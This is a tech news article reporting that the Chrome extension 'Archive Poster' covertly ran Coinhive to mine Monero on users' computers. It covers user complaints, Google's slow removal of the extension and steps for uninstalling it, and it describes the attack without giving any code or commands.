Sunday, February 5, 2023

Chrome Extension ‘Archive Poster’ Is Being Used to Mine Cryptocurrency

Chrome Extension ‘Archive Poster’ Is Being Used to Mine Cryptocurrency

Have you heard of “crypto-jacking”? You should — it’s become quite common in the last few months. The idea of using someone else’s computer’s resources to mine digital coins without their permission has grown alongside crypto asset prices, and a popular Chrome extension is the latest culprit.

Also read: Adam Back: Bitmain Office ‘Vandal’ Wasn’t a Blockstream Contractor at the Time

Join the Bitsonline Telegram channel to get the latest Bitcoin, cryptocurrency, and tech news updates:

Hijacking Others’ Computers Now a Regular Threat

Archive Poster is supposedly designed to assist users wishing to repost Tumblr blogs. However, aside from its claimed operations, reviews in the Chrome store stated Archive Poster is surreptitiously running Coinhive — a distributed-network mining program for digital currency.

One review exclaimed:

“ATTENTION! DANGEROUS! This extension is hijacked since a few weeks with a code which mines crypto-currency, which means it will change and read ALL data and sites you visit and causes 100 percent CPU usage.”

Another warned users to stay away, saying, “Do not use this extension as it comes loaded with a cryptocurrency mining script. Once installed, it makes requests to Coinhive which eats up your CPU time and slows your computer down massively. Avoid.”

As of December 29th, a newer version of Archive Poster has appeared in the Chrome Web Store, marked “safe”. At press time, though, it had no ratings or reviews.

Archive Poster

Crypto-Jacking Miners Prefer Monero

As with last week’s announcement that Facebook Messenger was being used for similar purposes. Monero is the cryptocurrency that hackers seem to be after, and the developer of Archive Poster is using it to grow his (or her) XMR stash with a little help from your electricity and computer.

The Archive Poster extension previously had over 105,000 users, all of which were likely (and unknowingly) mining monero through their own systems.

Chrome Users Aren’t Getting Much Help

Despite numerous complaints and warnings from customers over the past few weeks, it took Google several weeks to remove malicious extension from the Chrome Store. One user even claimed to have reported Archive Poster in the Google Chrome Help Forum, but was told by an online staffer to “get in touch with the extension developer for further assistance.”

Thus far, the developer has remained silent on the hack, and has not provided any information regarding when or how it took place, or who is responsible for it.

U.S.-based security researcher Troy Mursch stated that the crypto-jacking code hides within a JavaScript file loaded from a given URL. Once the hacked computer is activated, three web-socket sessions are invoked, and the application immediately begins mining cryptocurrency without user permission.

Users that installed the application recently are advised to type chrome://extensions into their browsers and click on the trash can icon next to the extension to get rid of it.

Will we continue to see cases of crypto-jacking in the coming months as digital currency prices rise? Post your comments below.

Images via Pixabay, Google

Bitsonline Email Newsletter